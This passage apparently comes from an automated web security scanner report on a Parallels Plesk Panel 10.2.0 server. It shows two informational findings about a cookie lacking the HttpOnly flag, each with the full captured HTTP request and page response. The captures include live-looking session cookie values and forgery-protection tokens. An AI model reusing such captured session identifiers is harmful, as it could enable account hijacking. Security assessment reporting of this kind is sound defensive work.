           <DIV class="commonButton" id="bid-dbbackup-repository" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up and restore databases.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;" style=""><BUTTON name="bname_dbbackup-repository" id="buttonid-dbbackup-repository" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;">Database Backup Repository</BUTTON><SPAN id="spanid-dbbackup-repository">Database Backup Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-refresh" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Refresh data on the screen.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_refresh" id="buttonid-refresh" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Refresh</BUTTON><SPAN id="spanid-refresh">Refresh</SPAN></DIV>
       </div>
   </td></tr>
   </table>
   </fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Backups</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0">
       <tr><td>
           <div id="screenTabs"><div id="tabs"><ul><li class="first"><A href="/plesk/client@2/domain@1/backup/local-repository/" onClick=";lon();"><span>Server Repository</span></a></li><li id="current"><A href="/plesk/client@2/domain@1/backup/ftp-repository/" onClick=";lon();"><span>Personal FTP Repository</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/backup/task@/" onClick=";lon();"><span>Current Backup Tasks</span></a></li></ul></div></div>
       </td></tr>
       <tr><td>
           <div id="list">
               <script>
           function a(event) {tooltip.set(event, [{"type":"string","string":"This is a valid backup. Data can be restored from this backup."}]);}
           function b(event) {tooltip.set(event, [{"type":"string","string":"This is not a valid backup. Data cannot be restored from this file."}]);}
       </script><div class="paging pagingTop noList">Personal FTP repository is not set up. <a href="/plesk/client@2/domain@1/backup/ftp-repository/properties/">Set up personal FTP repository</a>.</div><div class="paging pagingBottom noList"></div><script>SetCookie("backupftprepositorylist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function BackupFTPRepositoryListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function BackupFTPRepositoryListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function BackupFTPRepositoryListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function BackupFTPRepositoryListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.BackupFTPRepositoryListSelectAll.checked;
                           BackupFTPRepositoryListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function BackupFTPRepositoryListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function BackupFTPRepositoryListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function BackupFTPRepositoryListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   BackupFTPRepositoryListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupFTPRepositoryListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupFTPRepositoryListSearchShow()
           {
               var sc = document.getElementById("BackupFTPRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("BackupFTPRepositoryListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function BackupFTPRepositoryListSearchHide()
           {
               var sc = document.getElementById("BackupFTPRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("BackupFTPRepositoryListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function BackupFTPRepositoryListRemove(f)
           {
               if (0 == BackupFTPRepositoryListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/backup/ftp-repository/";
               lsubmit(f);
               return false;
           }
       </script>
           </div>
       </td></tr>        
       </table>
   </fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.15. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Personal FTP Repository Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository.properties/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.16. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/local-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:17:04 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:17:08 GMT
Connection: close
Content-Length: 19968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3Dfdf080d98498c6ba411aaacb%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Backup Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.local-repository/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/local-repository/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
   <legend>Tools</legend>
   <table width="100%" cellspacing="0" cellpadding="0" border="0">
   <tr><td>
       <div class="screenButtons">
